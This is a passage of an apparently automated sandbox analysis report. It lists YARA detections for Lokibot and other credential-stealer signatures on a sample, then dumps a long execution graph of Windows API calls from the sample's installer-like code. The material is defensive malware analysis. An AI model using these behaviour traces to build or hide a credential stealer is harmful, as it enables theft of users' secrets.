                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        Reset < >

                          Execution Graph

                          Execution Coverage:15.4%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:16.8%
                          Total number of Nodes:1372
                          Total number of Limit Nodes:20
                          execution_graph 3196 401941 3197 401943 3196->3197 3202 402da6 3197->3202 3203 402db2 3202->3203 3244 406544 3203->3244 3206 401948 3208 405c13 3206->3208 3286 405ede 3208->3286 3211 405c52 3217 405d72 3211->3217 3300 406507 lstrcpynW 3211->3300 3212 405c3b DeleteFileW 3240 401951 3212->3240 3214 405c78 3215 405c8b 3214->3215 3216 405c7e lstrcatW 3214->3216 3301 405e22 lstrlenW 3215->3301 3218 405c91 3216->3218 3217->3240 3329 40683d FindFirstFileW 3217->3329 3221 405ca1 lstrcatW 3218->3221 3223 405cac lstrlenW FindFirstFileW 3218->3223 3221->3223 3223->3217 3242 405cce 3223->3242 3227 405d55 FindNextFileW 3230 405d6b FindClose 3227->3230 3227->3242 3228 405bcb 5 API calls 3229 405dad 3228->3229 3231 405db1 3229->3231 3232 405dc7 3229->3232 3230->3217 3235 405569 24 API calls 3231->3235 3231->3240 3234 405569 24 API calls 3232->3234 3234->3240 3237 405dbe 3235->3237 3236 405c13 60 API calls 3236->3242 3239 4062c7 36 API calls 3237->3239 3238 405569 24 API calls 3238->3227 3239->3240 3242->3227 3242->3236 3242->3238 3305 406507 lstrcpynW 3242->3305 3306 405bcb 3242->3306 3314 405569 3242->3314 3325 4062c7 MoveFileExW 3242->3325 3245 406551 3244->3245 3246 406774 3245->3246 3249 406742 lstrlenW 3245->3249 3250 406659 GetSystemDirectoryW 3245->3250 3254 406544 10 API calls 3245->3254 3255 40666c GetWindowsDirectoryW 3245->3255 3256 4066e3 lstrcatW 3245->3256 3257 406544 10 API calls 3245->3257 3258 40678e 5 API calls 3245->3258 3259 40669b SHGetSpecialFolderLocation 3245->3259 3270 4063d5 3245->3270 3275 40644e wsprintfW 3245->3275 3276 406507 lstrcpynW 3245->3276 3247 402dd3 3246->3247 3277 406507 lstrcpynW 3246->3277 3247->3206 3261 40678e 3247->3261 3249->3245 3250->3245 3254->3249 3255->3245 3256->3245 3257->3245 3258->3245 3259->3245 3260 4066b3 SHGetPathFromIDListW CoTaskMemFree 3259->3260 3260->3245 3268 40679b 3261->3268 3262 406811 3263 406816 CharPrevW 3262->3263 3266 406837 3262->3266 3263->3262 3264 406804 CharNextW 3264->3262 3264->3268 3266->3206 3267 4067f0 CharNextW 3267->3268 3268->3262 3268->3264 3268->3267 3269 4067ff CharNextW 3268->3269 3282 405e03 3268->3282 3269->3264 3278 406374 3270->3278 3273 406439 3273->3245 3274 406409 RegQueryValueExW RegCloseKey 3274->3273 3275->3245 3276->3245 3277->3247 3279 406383 3278->3279 3280 406387 3279->3280 3281 40638c RegOpenKeyExW 3279->3281 3280->3273 3280->3274 3281->3280 3283 405e09 3282->3283 3284 405e1f 3283->3284 3285 405e10 CharNextW 3283->3285 3284->3268 3285->3283 3335 406507 lstrcpynW 3286->3335 3288 405eef 3336 405e81 CharNextW CharNextW 3288->3336 3291 405c33 3291->3211 3291->3212 3292 40678e 5 API calls 3298 405f05 3292->3298 3293 405f36 lstrlenW 3294 405f41 3293->3294 3293->3298 3295 405dd6 3 API calls 3294->3295 3297 405f46 GetFileAttributesW 3295->3297 3296 40683d 2 API calls 3296->3298 3297->3291 3298->3291 3298->3293 3298->3296 3299 405e22 2 API calls 3298->3299 3299->3293 3300->3214 3302 405e30 3301->3302 3303 405e42 3302->3303 3304 405e36 CharPrevW 3302->3304 3303->3218 3304->3302 3304->3303 3305->3242 3342 405fd2 GetFileAttributesW 3306->3342 3309 405bf8 3309->3242 3310 405be6 RemoveDirectoryW 3312 405bf4 3310->3312 3311 405bee DeleteFileW 3311->3312 3312->3309 3313 405c04 SetFileAttributesW 3312->3313 3313->3309 3315 405584 3314->3315 3316 405626 3314->3316 3317 4055a0 lstrlenW 3315->3317 3318 406544 17 API calls 3315->3318 3316->3242 3319 4055c9 3317->3319 3320 4055ae lstrlenW 3317->3320 3318->3317 3322 4055dc 3319->3322 3323 4055cf SetWindowTextW 3319->3323 3320->3316 3321 4055c0 lstrcatW 3320->3321 3321->3319 3322->3316 3324 4055e2 SendMessageW SendMessageW SendMessageW 3322->3324 3323->3322 3324->3316 3326 4062e8 3325->3326 3327 4062db 3325->3327 3326->3242 3345 40614d 3327->3345 3330 406853 FindClose 3329->3330 3331 405d97 3329->3331 3330->3331 3331->3240 3332 405dd6 lstrlenW CharPrevW 3331->3332 3333 405df2 lstrcatW 3332->3333 3334 405da1 3332->3334 3333->3334 3334->3228 3335->3288 3337 405e9e 3336->3337 3339 405eb0 3336->3339 3338 405eab CharNextW 3337->3338 3337->3339 3341 405ed4 3338->3341 3340 405e03 CharNextW 3339->3340 3339->3341 3340->3339 3341->3291 3341->3292 3343 405bd7 3342->3343 3344 405fe4 SetFileAttributesW 3342->3344 3343->3309 3343->3310 3343->3311 3344->3343 3346 4061a3 GetShortPathNameW 3345->3346 3347 40617d 3345->3347 3349 4062c2 3346->3349 3350 4061b8 3346->3350 3372 405ff7 GetFileAttributesW CreateFileW 3347->3372 3349->3326 3350->3349 3352 4061c0 wsprintfA 3350->3352 3351 406187 CloseHandle GetShortPathNameW 3351->3349 3353 40619b 3351->3353 3354 406544 17 API calls 3352->3354 3353->3346 3353->3349 3355 4061e8 3354->3355 3373 405ff7 GetFileAttributesW CreateFileW 3355->3373 3357 4061f5 3357->3349 3358 406204 GetFileSize GlobalAlloc 3357->3358 3359 406226 3358->3359 3360 4062bb CloseHandle 3358->3360 3374 40607a ReadFile 3359->3374 3360->3349 3365 406245 lstrcpyA 3370 406267 3365->3370 3366 406259 3367 405f5c 4 API calls 3366->3367 3367->3370 3368 40629e SetFilePointer 3381 4060a9 WriteFile 3368->3381 3370->3368 3372->3351 3373->3357 3375 406098 3374->3375 3375->3360 3376 405f5c lstrlenA 3375->3376 3377 405f9d lstrlenA 3376->3377 3378 405fa5 3377->3378 3379 405f76 lstrcmpiA 3377->3379 3378->3365 3378->3366 3379->3378 3380 405f94 CharNextA 3379->3380 3380->3377 3382 4060c7 GlobalFree 3381->3382 3382->3360 3383 4015c1 3384 402da6 17 API calls 3383->3384 3385 4015c8 3384->3385 3386 405e81 4 API calls 3385->3386 3398 4015d1 3386->3398 3387 401631 3389 401663 3387->3389 3390 401636 3387->3390 3388 405e03 CharNextW 3388->3398 3392 401423 24 API calls 3389->3392 3410 401423 3390->3410 3399 40165b 3392->3399 3397 40164a SetCurrentDirectoryW 3397->3399 3398->3387 3398->3388 3400 401617 GetFileAttributesW 3398->3400 3402 405ad2 3398->3402 3405 405a38 CreateDirectoryW 3398->3405 3414 405ab5 CreateDirectoryW 3398->3414 3400->3398 3417 4068d4 GetModuleHandleA 3402->3417 3406 405a85 3405->3406 3407 405a89 GetLastError 3405->3407 3406->3398 3407->3406 3408 405a98 SetFileSecurityW 3407->3408 3408->3406 3409 405aae GetLastError 3408->3409 3409->3406 3411 405569 24 API calls 3410->3411 3412 401431 3411->3412 3413 406507 lstrcpynW 3412->3413 3413->3397 3415 405ac9 GetLastError 3414->3415 3416 405ac5 3414->3416 3415->3416 3416->3398 3418 4068f0 3417->3418 3419 4068fa GetProcAddress 3417->3419 3423 406864 GetSystemDirectoryW 3418->3423 3421 405ad9 3419->3421 3421->3398 3422 4068f6 3422->3419 3422->3421 3424 406886 wsprintfW LoadLibraryExW 3423->3424 3424->3422 3889 401c43 3911 402d84 3889->3911 3891 401c4a 3892 402d84 17 API calls 3891->3892 3893 401c57 3892->3893 3894 401c6c 3893->3894 3895 402da6 17 API calls 3893->3895 3896 402da6 17 API calls 3894->3896 3900 401c7c 3894->3900 3895->3894 3896->3900 3897 401cd3 3899 402da6 17 API calls 3897->3899 3898 401c87 3901 402d84 17 API calls 3898->3901 3902 401cd8 3899->3902 3900->3897 3900->3898 3903 401c8c 3901->3903 3905 402da6 17 API calls 3902->3905 3904 402d84 17 API calls 3903->3904 3906 401c98 3904->3906 3907 401ce1 FindWindowExW 3905->3907 3908 401cc3 SendMessageW 3906->3908 3909 401ca5 SendMessageTimeoutW 3906->3909 3910 401d03 3907->3910 3908->3910 3909->3910 3912 406544 17 API calls 3911->3912 3913 402d99 3912->3913 3913->3891 3914 4028c4 3915 4028ca 3914->3915 3916 4028d2 FindClose 3915->3916 3917 402c2a 3915->3917 3916->3917 3928 4016cc 3929 402da6 17 API calls 3928->3929 3930 4016d2 GetFullPathNameW 3929->3930 3931 4016ec 3930->3931 3937 40170e 3930->3937 3933 40683d 2 API calls 3931->3933 3931->3937 3932 401723 GetShortPathNameW 3934 402c2a 3932->3934 3935 4016fe 3933->3935 3935->3937 3938 406507 lstrcpynW 3935->3938 3937->3932 3937->3934 3938->3937 3939 401e4e GetDC 3940 402d84 17 API calls 3939->3940 3941 401e60 GetDeviceCaps MulDiv ReleaseDC 3940->3941 3942 402d84 17 API calls 3941->3942 3943 401e91 3942->3943 3944 406544 17 API calls 3943->3944 3945 401ece CreateFontIndirectW 3944->3945 3946 402638 3945->3946 3947 402950 3948 402da6 17 API calls 3947->3948 3949 40295c 3948->3949 3950 402972 3949->3950 3951 402da6 17 API calls 3949->3951 3952 405fd2 2 API calls 3950->3952 3951->3950 3953 402978 3952->3953 3975 405ff7 GetFileAttributesW CreateFileW 3953->3975 3955 402985 3956 402a3b 3955->3956 3957 4029a0 GlobalAlloc 3955->3957 3958 402a23 3955->3958 3959 402a42 DeleteFileW 3956->3959 3960 402a55 3956->3960 3957->3958 3961 4029b9 3957->3961 3962 4032b4 35 API calls 3958->3962 3959->3960 3976 4034af SetFilePointer 3961->3976 3964 402a30 CloseHandle 3962->3964 3964->3956 3965 4029bf 3966 403499 ReadFile 3965->3966 3967 4029c8 GlobalAlloc 3966->3967 3968 4029d8 3967->3968 3969 402a0c 3967->3969 3971 4032b4 35 API calls 3968->3971 3970 4060a9 WriteFile 3969->3970 3972 402a18 GlobalFree 3970->3972 3974 4029e5 3971->3974 3972->3958 3973 402a03 GlobalFree 3973->3969 3974->3973 3975->3955 3976->3965 3977 404ed0 GetDlgItem GetDlgItem 3978 404f22 7 API calls 3977->3978 3986 405147 3977->3986 3979 404fc9 DeleteObject 3978->3979 3980 404fbc SendMessageW 3978->3980 3981 404fd2 3979->3981 3980->3979 3982 405009 3981->3982 3987 406544 17 API calls 3981->3987 3984 404463 18 API calls 3982->3984 3983 405229 3985 4052d5 3983->3985 3994 405282 SendMessageW 3983->3994 4020 40513a 3983->4020 3988 40501d 3984->3988 3989 4052e7 3985->3989 3990 4052df SendMessageW 3985->3990 3986->3983 4005 4051b6 3986->4005 4031 404e1e SendMessageW 3986->4031 3991 404feb SendMessageW SendMessageW 3987->3991 3993 404463 18 API calls 3988->3993 3997 405300 3989->3997 3998 4052f9 ImageList_Destroy 3989->3998 4006 405310 3989->4006 3990->3989 3991->3981 4011 40502e 3993->4011 4000 405297 SendMessageW 3994->4000 3994->4020 3995 40521b SendMessageW 3995->3983 3996 4044ca 8 API calls 4001 4054d6 3996->4001 4002 405309 GlobalFree 3997->4002 3997->4006 3998->3997 3999 40548a 4007 40549c ShowWindow GetDlgItem ShowWindow 3999->4007 3999->4020 4004 4052aa 4000->4004 4002->4006 4003 405109 GetWindowLongW SetWindowLongW 4008 405122 4003->4008 4015 4052bb SendMessageW 4004->4015 4005->3983 4005->3995 4006->3999 4022 40534b 4006->4022 4036 404e9e 4006->4036 4007->4020 4009 405127 ShowWindow 4008->4009 4010 40513f 4008->4010 4029 404498 SendMessageW 4009->4029 4030 404498 SendMessageW 4010->4030 4011->4003 4014 405081 SendMessageW 4011->4014 4016 405104 4011->4016 4017 4050d3 SendMessageW 4011->4017 4018 4050bf SendMessageW 4011->4018 4014->4011 4015->3985 4016->4003 4016->4008 4017->4011 4018->4011 4020->3996 4021 405455 4023 405460 InvalidateRect 4021->4023 4025 40546c 4021->4025 4024 405379 SendMessageW 4022->4024 4026 40538f 4022->4026 4023->4025 4024->4026 4025->3999 4045 404dd9 4025->4045 4026->4021 4027 405403 SendMessageW SendMessageW 4026->4027 4027->4026 4029->4020 4030->3986 4032 404e41 GetMessagePos ScreenToClient SendMessageW 4031->4032 4033 404e7d SendMessageW 4031->4033 4034 404e75 4032->4034 4035 404e7a 4032->4035 4033->4034 4034->4005 4035->4033 4048 406507 lstrcpynW 4036->4048 4038 404eb1 4049 40644e wsprintfW 4038->4049 4040 404ebb 4041 40140b 2 API calls 4040->4041 4042 404ec4 4041->4042 4050 406507 lstrcpynW 4042->4050 4044 404ecb 4044->4022 4051 404d10 4045->4051 4047 404dee 4047->3999 4048->4038 4049->4040 4050->4044 4052 404d29 4051->4052 4053 406544 17 API calls 4052->4053 4054 404d8d 4053->4054 4055 406544 17 API calls 4054->4055 4056 404d98 4055->4056 4057 406544 17 API calls 4056->4057 4058 404dae lstrlenW wsprintfW SetDlgItemTextW 4057->4058 4058->4047 4059 4045d3 lstrlenW 4060 4045f2 4059->4060 4061 4045f4 WideCharToMultiByte 4059->4061 4060->4061 4062 404954 4063 404980 4062->4063 4064 404991 4062->4064 4123 405b4b GetDlgItemTextW 4063->4123 4066 40499d GetDlgItem 4064->4066 4072 4049fc 4064->4072 4067 4049b1 4066->4067 4071 4049c5 SetWindowTextW 4067->4071 4075 405e81 4 API calls 4067->4075 4068 404ae0 4121 404c8f 4068->4121 4125 405b4b GetDlgItemTextW 4068->4125 4069 40498b 4070 40678e 5 API calls 4069->4070 4070->4064 4076 404463 18 API calls 4071->4076 4072->4068 4077 406544 17 API calls 4072->4077 4072->4121 4074 4044ca 8 API calls 4079 404ca3 4074->4079 4080 4049bb 4075->4080 4081 4049e1 4076->4081 4082 404a70 SHBrowseForFolderW 4077->4082 4078 404b10 4083 405ede 18 API calls 4078->4083 4080->4071 4087 405dd6 3 API calls 4080->4087 4084 404463 18 API calls 4081->4084 4082->4068 4085 404a88 CoTaskMemFree 4082->4085 4086 404b16 4083->4086 4088 4049ef 4084->4088 4089 405dd6 3 API calls 4085->4089 4126 406507 lstrcpynW 4086->4126 4087->4071 4124 404498 SendMessageW 4088->4124 4091 404a95 4089->4091 4094 404acc SetDlgItemTextW 4091->4094 4098 406544 17 API calls 4091->4098 4093 4049f5 4096 4068d4 5 API calls 4093->4096 4094->4068 4095 404b2d 4097 4068d4 5 API calls 4095->4097 4096->4072 4104 404b34 4097->4104 4099 404ab4 lstrcmpiW 4098->4099 4099->4094 4101 404ac5 lstrcatW 4099->4101 4100 404b75 4127 406507 lstrcpynW 4100->4127 4101->4094 4103 404b7c 4105 405e81 4 API calls 4103->4105 4104->4100 4109 405e22 2 API calls 4104->4109 4110 404bcd 4104->4110 4106 404b82 GetDiskFreeSpaceW 4105->4106 4108 404ba6 MulDiv 4106->4108 4106->4110 4108->4110 4109->4104 4112 404dd9 20 API calls 4110->4112 4120 404c3e 4110->4120 4111 404c61 4128 404485 EnableWindow 4111->4128 4114 404c2b 4112->4114 4113 40140b 2 API calls 4113->4111 4116 404c40 SetDlgItemTextW 4114->4116 4117 404c30 4114->4117 4116->4120 4118 404d10 20 API calls 4117->4118 4118->4120 4119 404c7d 4119->4121 4129 4048ad 4119->4129 4120->4111 4120->4113 4121->4074 4123->4069 4124->4093 4125->4078 4126->4095 4127->4103 4128->4119 4130 4048c0 SendMessageW 4129->4130 4131 4048bb 4129->4131 4130->4121 4131->4130 4132 401956 4133 402da6 17 API calls 4132->4133 4134 40195d lstrlenW 4133->4134 4135 402638 4134->4135 4136 4014d7 4137 402d84 17 API calls 4136->4137 4138 4014dd Sleep 4137->4138 4140 402c2a 4138->4140 4141 4020d8 4142 40219c 4141->4142 4143 4020ea 4141->4143 4145 401423 24 API calls 4142->4145 4144 402da6 17 API calls 4143->4144 4146 4020f1 4144->4146 4151 4022f6 4145->4151 4147 402da6 17 API calls 4146->4147 4148 4020fa 4147->4148 4149 402110 LoadLibraryExW 4148->4149 4150 402102 GetModuleHandleW 4148->4150 4149->4142 4152 402121 4149->4152 4150->4149 4150->4152 4161 406943 4152->4161 4155 402132 4158 401423 24 API calls 4155->4158 4159 402142 4155->4159 4156 40216b 4157 405569 24 API calls 4156->4157 4157->4159 4158->4159 4159->4151 4160 40218e FreeLibrary 4159->4160 4160->4151 4166 406529 WideCharToMultiByte 4161->4166 4163 406960 4164 406967 GetProcAddress 4163->4164 4165 40212c 4163->4165 4164->4165 4165->4155 4165->4156 4166->4163 4167 402b59 4168 402b60 4167->4168 4169 402bab 4167->4169 4172 402d84 17 API calls 4168->4172 4175 402ba9 4168->4175 4170 4068d4 5 API calls 4169->4170 4171 402bb2 4170->4171 4173 402da6 17 API calls 4171->4173 4174 402b6e 4172->4174 4176 402bbb 4173->4176 4177 402d84 17 API calls 4174->4177 4176->4175 4178 402bbf IIDFromString 4176->4178 4180 402b7a 4177->4180 4178->4175 4179 402bce 4178->4179 4179->4175 4185 406507 lstrcpynW 4179->4185 4184 40644e wsprintfW 4180->4184 4182 402beb CoTaskMemFree 4182->4175 4184->4175 4185->4182 4186 402a5b 4187 402d84 17 API calls 4186->4187 4188 402a61 4187->4188 4189 402aa4 4188->4189 4190 402a88 4188->4190 4198 40292e 4188->4198 4192 402abe 4189->4192 4193 402aae 4189->4193 4191 402a8d 4190->4191 4194 402a9e 4190->4194 4200 406507 lstrcpynW 4191->4200 4196 406544 17 API calls 4192->4196 4195 402d84 17 API calls 4193->4195 4194->4198 4201 40644e wsprintfW 4194->4201 4195->4194 4196->4194 4200->4198 4201->4198 3831 40175c 3832 402da6 17 API calls 3831->3832 3833 401763 3832->3833 3834 406026 2 API calls 3833->3834 3835 40176a 3834->3835 3836 406026 2 API calls 3835->3836 3836->3835 3837 403adc 3838 403af4 3837->3838 3839 403ae6 CloseHandle 3837->3839 3844 403b21 3838->3844 3839->3838 3842 405c13 67 API calls 3843 403b05 3842->3843 3845 403b2f 3844->3845 3846 403af9 3845->3846 3847 403b34 FreeLibrary GlobalFree 3845->3847 3846->3842 3847->3846 3847->3847 4202 401d5d 4203 402d84 17 API calls 4202->4203 4204 401d6e SetWindowLongW 4203->4204 4205 402c2a 4204->4205 4206 4054dd 4207 405501 4206->4207 4208 4054ed 4206->4208 4211 405509 IsWindowVisible 4207->4211 4217 405520 4207->4217 4209 4054f3 4208->4209 4210 40554a 4208->4210 4212 4044af SendMessageW 4209->4212 4214 40554f CallWindowProcW 4210->4214 4211->4210 4213 405516 4211->4213 4215 4054fd 4212->4215 4216 404e1e 5 API calls 4213->4216 4214->4215 4216->4217 4217->4214 4218 404e9e 4 API calls 4217->4218 4218->4210 4219 4028de 4220 4028e6 4219->4220 4221 4028ea FindNextFileW 4220->4221 4224 4028fc 4220->4224 4222 402943 4221->4222 4221->4224 4225 406507 lstrcpynW 4222->4225 4225->4224 4233 401563 4234 402ba4 4233->4234 4237 40644e wsprintfW 4234->4237 4236 402ba9 4237->4236 3426 403f64 3427 403f7c 3426->3427 3428 4040dd 3426->3428 3427->3428 3431 403f88 3427->3431 3429 40412e 3428->3429 3430 4040ee GetDlgItem GetDlgItem 3428->3430 3433 404188 3429->3433 3528 401389 3429->3528 3502 404463 3430->3502 3434 403f93 SetWindowPos 3431->3434 3435 403fa6 3431->3435 3446 4040d8 3433->3446 3508 4044af 3433->3508 3434->3435 3438 403ff1 3435->3438 3439 403faf ShowWindow 3435->3439 3436 404118 KiUserCallbackDispatcher 3505 40140b 3436->3505 3443 404010 3438->3443 3444 403ff9 DestroyWindow 3438->3444 3440 4040ca 3439->3440 3441 403fcf GetWindowLongW 3439->3441 3514 4044ca 3440->3514 3441->3440 3447 403fe8 ShowWindow 3441->3447 3449 404015 SetWindowLongW 3443->3449 3450 404026 3443->3450 3448 40440d 3444->3448 3447->3438 3448->3446 3457 40441d ShowWindow 3448->3457 3449->3446 3450->3440 3455 404032 GetDlgItem 3450->3455 3453 40140b 2 API calls 3468 40419a 3453->3468 3454 4043ee DestroyWindow EndDialog 3454->3448 3458 404060 3455->3458 3459 404043 SendMessageW IsWindowEnabled 3455->3459 3456 404164 SendMessageW 3456->3446 3457->3446 3461 40406d 3458->3461 3463 4040b4 SendMessageW 3458->3463 3464 404080 3458->3464 3472 404065 3458->3472 3459->3446 3459->3458 3460 406544 17 API calls 3460->3468 3461->3463 3461->3472 3463->3440 3465 404088 3464->3465 3466 40409d 3464->3466 3469 40140b 2 API calls 3465->3469 3470 40140b 2 API calls 3466->3470 3467 40409b 3467->3440 3468->3453 3468->3454 3468->3460 3471 404463 18 API calls 3468->3471 3474 404463 18 API calls 3468->3474 3469->3472 3473 4040a4 3470->3473 3471->3468 3511 40443c 3472->3511 3473->3440 3473->3472 3475 404215 GetDlgItem 3474->3475 3476 404232 ShowWindow EnableWindow 3475->3476 3477 40422a 3475->3477 3532 404485 EnableWindow 3476->3532 3477->3476 3479 40425c EnableWindow 3484 404270 3479->3484 3480 404275 GetSystemMenu EnableMenuItem SendMessageW 3481 4042a5 SendMessageW 3480->3481 3480->3484 3481->3484 3484->3480 3533 404498 SendMessageW 3484->3533 3534 403f45 3484->3534 3537 406507 lstrcpynW 3484->3537 3486 4042d4 lstrlenW 3487 406544 17 API calls 3486->3487 3488 4042ea SetWindowTextW 3487->3488 3489 401389 2 API calls 3488->3489 3490 4042fb 3489->3490 3490->3446 3490->3468 3491 40432e DestroyWindow 3490->3491 3493 404329 3490->3493 3491->3448 3492 404348 CreateDialogParamW 3491->3492 3492->3448 3494 40437b 3492->3494 3493->3446 3495 404463 18 API calls 3494->3495 3496 404386 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3495->3496 3497 401389 2 API calls 3496->3497 3498 4043cc 3497->3498 3498->3446 3499 4043d4 ShowWindow 3498->3499 3500 4044af SendMessageW 3499->3500 3501 4043ec 3500->3501 3501->3448 3503 406544 17 API calls 3502->3503 3504 40446e SetDlgItemTextW 3503->3504 3504->3436 3506 401389 2 API calls 3505->3506 3507 401420 3506->3507 3507->3429 3509 4044c7 3508->3509 3510 4044b8 SendMessageW 3508->3510 3509->3468 3510->3509 3512 404443 3511->3512 3513 404449 SendMessageW 3511->3513 3512->3513 3513->3467 3515 4044e2 GetWindowLongW 3514->3515 3516 40458d 3514->3516 3515->3516 3517 4044f7 3515->3517 3516->3446 3517->3516 3518 404524 GetSysColor 3517->3518 3519 404527 3517->3519 3518->3519 3520 404537 SetBkMode 3519->3520 3521 40452d SetTextColor 3519->3521 3522 404555 3520->3522 3523 40454f GetSysColor 3520->3523 3521->3520 3524 404566 3522->3524 3525 40455c SetBkColor 3522->3525 3523->3522 3524->3516 3526 404580 CreateBrushIndirect 3524->3526 3527 404579 DeleteObject 3524->3527 3525->3524 3526->3516 3527->3526 3530 401390 3528->3530 3529 4013fe 3529->3433 3529->3456 3530->3529 3531 4013cb MulDiv SendMessageW 3530->3531 3531->3530 3532->3479 3533->3484 3535 406544 17 API calls 3534->3535 3536 403f53 SetWindowTextW 3535->3536 3536->3484 3537->3486 4238 401968 4239 402d84 17 API calls 4238->4239 4240 40196f 4239->4240 4241 402d84 17 API calls 4240->4241 4242 40197c 4241->4242 4243 402da6 17 API calls 4242->4243 4244 401993 lstrlenW 4243->4244 4245 4019a4 4244->4245 4246 4019e5 4245->4246 4250 406507 lstrcpynW 4245->4250 4248 4019d5 4248->4246 4249 4019da lstrlenW 4248->4249 4249->4246 4250->4248 4251 40166a 4252 402da6 17 API calls 4251->4252 4253 401670 4252->4253 4254 40683d 2 API calls 4253->4254 4255 401676 4254->4255 4256 402aeb 4257 402d84 17 API calls 4256->4257 4258 402af1 4257->4258 4259 40292e 4258->4259 4260 406544 17 API calls 4258->4260 4260->4259 4261 4026ec 4262 402d84 17 API calls 4261->4262 4269 4026fb 4262->4269 4263 402838 4264 402745 ReadFile 4264->4263 4264->4269 4265 40607a ReadFile 4265->4269 4267 402785 MultiByteToWideChar 4267->4269 4268 40283a 4283 40644e wsprintfW 4268->4283 4269->4263 4269->4264 4269->4265 4269->4267 4269->4268 4271 4027ab SetFilePointer MultiByteToWideChar 4269->4271 4273 40284b 4269->4273 4274 4060d8 SetFilePointer 4269->4274 4271->4269 4272 40286c SetFilePointer 4272->4263 4273->4263 4273->4272 4275 4060f4 4274->4275 4278 40610c 4274->4278 4276 40607a ReadFile 4275->4276 4277 406100 4276->4277 4277->4278 4279 406115 SetFilePointer 4277->4279 4280 40613d SetFilePointer 4277->4280 4278->4269 4279->4280 4281 406120 4279->4281 4280->4278 4282 4060a9 WriteFile 4281->4282 4282->4278 4283->4263 3848 40176f 3849 402da6 17 API calls 3848->3849 3850 401776 3849->3850 3851 401796 3850->3851 3852 40179e 3850->3852 3887 406507 lstrcpynW 3851->3887 3888 406507 lstrcpynW 3852->3888 3855 40179c 3859 40678e 5 API calls 3855->3859 3856 4017a9 3857 405dd6 3 API calls 3856->3857 3858 4017af lstrcatW 3857->3858 3858->3855 3863 4017bb 3859->3863 3860 40683d 2 API calls 3860->3863 3861 405fd2 2 API calls 3861->3863 3863->3860 3863->3861 3864 4017cd CompareFileTime 3863->3864 3865 40188d 3863->3865 3871 406507 lstrcpynW 3863->3871 3874 406544 17 API calls 3863->3874 3880 405b67 MessageBoxIndirectW 3863->3880 3883 401864 3863->3883 3886 405ff7 GetFileAttributesW CreateFileW 3863->3886 3864->3863 3866 405569 24 API calls 3865->3866 3868 401897 3866->3868 3867 405569 24 API calls 3885 401879 3867->3885 3869 4032b4 35 API calls 3868->3869 3870 4018aa 3869->3870 3872 4018be SetFileTime 3870->3872 3873 4018d0 FindCloseChangeNotification 3870->3873 3871->3863 3872->3873 3875 4018e1 3873->3875 3873->3885 3874->3863 3876 4018e6 3875->3876 3877 4018f9 3875->3877 3878 406544 17 API calls 3876->3878 3879 406544 17 API calls 3877->3879 3881 4018ee lstrcatW 3878->3881 3882 401901 3879->3882 3880->3863 3881->3882 3884 405b67 MessageBoxIndirectW 3882->3884 3883->3867 3883->3885 3884->3885 3886->3863 3887->3855 3888->3856 4291 401a72 4292 402d84 17 API calls 4291->4292 4293 401a7b 4292->4293 4294 402d84 17 API calls 4293->4294 4295 401a20 4294->4295 4296 401573 4297 401583 ShowWindow 4296->4297 4298 40158c 4296->4298 4297->4298 4299 40159a ShowWindow 4298->4299 4300 402c2a 4298->4300 4299->4300 4301 403b74 4302 403b7f 4301->4302 4303 403b86 GlobalAlloc 4302->4303 4304 403b83 4302->4304 4303->4304 4305 4023f4 4306 402da6 17 API calls 4305->4306 4307 402403 4306->4307 4308 402da6 17 API calls 4307->4308 4309 40240c 4308->4309 4310 402da6 17 API calls 4309->4310 4311 402416 GetPrivateProfileStringW 4310->4311 4312 4014f5 SetForegroundWindow 4313 402c2a 4312->4313 4314 401ff6 4315 402da6 17 API calls 4314->4315 4316 401ffd 4315->4316 4317 40683d 2 API calls 4316->4317 4318 402003 4317->4318 4320 402014 4318->4320 4321 40644e wsprintfW 4318->4321 4321->4320 3566 4034f7 SetErrorMode GetVersionExW 3567 403581 3566->3567 3568 403549 GetVersionExW 3566->3568 3569 4035da 3567->3569 3570 4068d4 5 API calls 3567->3570 3568->3567 3571 406864 3 API calls 3569->3571 3570->3569 3572 4035f0 lstrlenA 3571->3572 3572->3569 3573 403600 3572->3573 3574 4068d4 5 API calls 3573->3574 3575 403607 3574->3575 3576 4068d4 5 API calls 3575->3576 3577 40360e 3576->3577 3578 4068d4 5 API calls 3577->3578 3579 40361a #17 OleInitialize SHGetFileInfoW 3578->3579 3656 406507 lstrcpynW 3579->3656 3582 403667 GetCommandLineW 3657 406507 lstrcpynW 3582->3657 3584 403679 3585 405e03 CharNextW 3584->3585 3586 40369f CharNextW 3585->3586 3591 4036b0 3586->3591 3587 4037ae 3588 4037c2 GetTempPathW 3587->3588 3658 4034c6 3588->3658 3590 4037da 3592 403834 DeleteFileW 3590->3592 3593 4037de GetWindowsDirectoryW lstrcatW 3590->3593 3591->3587 3594 405e03 CharNextW 3591->3594 3601 4037b0 3591->3601 3668 40307d GetTickCount GetModuleFileNameW 3592->3668 3595 4034c6 12 API calls 3593->3595 3594->3591 3597 4037fa 3595->3597 3597->3592 3600 4037fe GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3597->3600 3598 403847 3599 403a23 ExitProcess OleUninitialize 3598->3599 3606 405e03 CharNextW 3598->3606 3640 4038fc 3598->3640 3603 403a33 3599->3603 3604 403a48 3599->3604 3605 4034c6 12 API calls 3600->3605 3752 406507 lstrcpynW 3601->3752 3757 405b67 3603->3757 3609 403a50 GetCurrentProcess OpenProcessToken 3604->3609 3610 403ac6 ExitProcess 3604->3610 3611 40382c 3605->3611 3622 